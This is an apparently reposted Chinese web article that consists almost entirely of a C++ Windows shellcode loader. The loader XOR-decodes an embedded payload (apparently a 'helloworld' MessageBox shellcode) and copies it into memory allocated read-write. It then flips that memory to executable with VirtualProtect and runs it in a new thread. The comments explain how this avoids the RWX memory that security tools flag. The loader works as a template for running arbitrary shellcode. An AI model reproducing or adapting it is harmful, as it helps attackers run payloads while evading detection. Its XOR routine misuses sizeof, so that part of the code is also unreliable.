当前位置：首页 > article >正文

shellLoad

article 2024/11/15 1:12:20

#include <windows.h>

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include<iostream>

#include<cctype>

using namespace std;



//XOR异或

void xorData(unsigned char* data, size_t length, unsigned char* key) {

int j = 0;

for (int i = 0; i < sizeof length; i++) {

if (j == sizeof key - 1) j = 0;

data[i] = data[i] ^ key[j];

j++;

}

}



int main(void) {



void* exec_mem;

BOOL rv;

HANDLE th;

DWORD oldprotect = 0;



//shellcode在main函数内，存储在pe结构的sections table中的.text部分

unsigned char payload[] = "\x88\x21\xe5\x81\x83\x9a\x9c\x8b\xe8\xd0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x3e\x48\x8d\x8d\x25\x01\x00\x00\x41\xba\x4c\x77\x26\x07\xff\xd5\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x0e\x01\x00\x00\x3e\x4c\x8d\x85\x1a\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83\x56\x07\xff\xd5\x48\x31\xc9\x41\xba\xf0\xb5\xa2\x56\xff\xd5\x68\x65\x6c\x6c\x6f\x77\x6f\x72\x6c\x64\x21\x00\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00\x00";



unsigned int payload_len = sizeof(payload);

//KEY

unsigned char key[] = "tidesec";



xorData(payload, payload_len, key);



// 使用VirtualAlloc申请一个可读可写的内存，这里没有申请执行权限是为了防止出现RWX权限的敏感内存

exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);



// 将shellcode复制到申请的内存中，这里还可以用memcpy等

RtlMoveMemory(exec_mem, payload, payload_len);



// 使用VirtualProtect添加执行权限

rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);



// 如果返回正常，创建线程执行shellcode

if (rv != 0) {

th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0);

WaitForSingleObject(th, -1);

}



return 0;

}

查看全文

http://www.kler.cn/a/393720.html